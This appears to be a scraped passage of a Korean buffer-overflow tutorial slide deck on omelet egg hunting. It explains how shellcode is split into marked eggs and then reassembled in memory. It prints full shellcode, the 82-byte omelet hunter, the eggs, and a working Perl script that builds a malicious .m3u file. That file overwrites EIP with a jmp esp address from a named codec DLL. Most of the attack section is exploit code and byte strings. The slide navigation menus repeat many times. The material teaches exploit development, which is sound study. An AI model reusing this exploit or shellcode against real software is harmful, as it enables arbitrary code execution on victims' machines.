Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
Search though memory
'
![Page 50: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/50.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
(
Find Marker
![Page 51: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/51.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
)
Check length/index
![Page 52: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/52.jpg)
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c
Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
)
reproduces the original shellcode at the bottom of the stack
![Page 53: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/53.jpg)
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
🔟
jumps to the reproduced shellcode and executes it
![Page 54: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/54.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
![Page 55: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/55.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
오믈렛 코드 패키지 다운로드(쉘코드 단편화 및 오믈렛 코드 생성 스크립트)
W32-seh-omelet-shellcode (by Skylined) https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list
![Page 56: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/56.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
쉘코드 파일 생성 (makingShellCodeForOmelet.pl)my $scfile="shellcode.bin"; my $shellcode="\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" . "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" . "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" . "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" . "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" . "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" . "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" . "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" . "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" . "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" . "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" . "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" . "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" . "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" . "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" . "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" . "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" . "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" . "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" . "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" . "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" . "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";
open(FILE,">$scfile"); print FILE $shellcode; close(FILE); print "Wrote ".length($shellcode)." bytes to file ".$scfile."\n";
![Page 57: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/57.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.pySyntax: w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes]
Where: omelet bin file = The omelet shellcode stage binary code followed by three bytes of the offsets of the "marker bytes", "max index" and "egg size" variables in the code. shellcode bin file = The shellcode binary code you want to have stored in the eggs and reconstructed by the omelet shellcode stage code. output txt file = The file you want the omelet egg-hunt code and the eggs to be written to (in text format). egg size = The size of each egg (legal values: 6-127, default: 127) marker bytes = The value you want to use as a marker to distinguish the eggs from other data in user-land address space (legal values: 0-0xFFFFFF, default value: 0x280876)
C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55
Convert the shell code to eggs
![Page 58: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/58.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55
// This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes:omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";
// These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode// (you can insert them as many times as you want, as long as each one is// inserted at least once). They are 127 bytes each:egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
![Page 59: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/59.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
쉘코드를 에그로 변환
하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55
// This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes:omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";
// These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode// (you can insert them as many times as you want, as long as each one is// inserted at least once). They are 127 bytes each:egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
omelet_code
egg0
egg1
egg2
![Page 60: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/60.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50". "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33". "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42". "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58". "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30". "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45". "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31". "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59". "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43". "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55". "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44". "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C". "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51". "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30". "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38". "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D". "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37". "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40". "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
open($FILE,">$file"); print $FILE $junk.$eip.$padding.$omelet_code.$garbage.$egg1.$garbage.$egg2.$garbage.$egg3; close($FILE); print "m3u File Created successfully\n";
![Page 61: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/61.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
접근 위반 발생 (Access violation when reading [00000000]
![Page 62: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting](https://reader036.vdocuments.site/reader036/viewer/2022062313/55a260271a28ab520d8b45be/html5/thumbnails/62.jpg)
How to made Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
w32_SEH_omelet.asm / shellcode Analysis my $file= "OmeletEggHuntingExploit1.m3u";
my $junk= "A" x 26039; my $eip = pack('V',0x7608fcfe); #jmp esp from MSRMCcodec02.dll
my $padding = "\x90" x 25; my $garbage="This is a bunch of garbage" x 10;
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2". "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59". "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08". "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF". "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8". "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
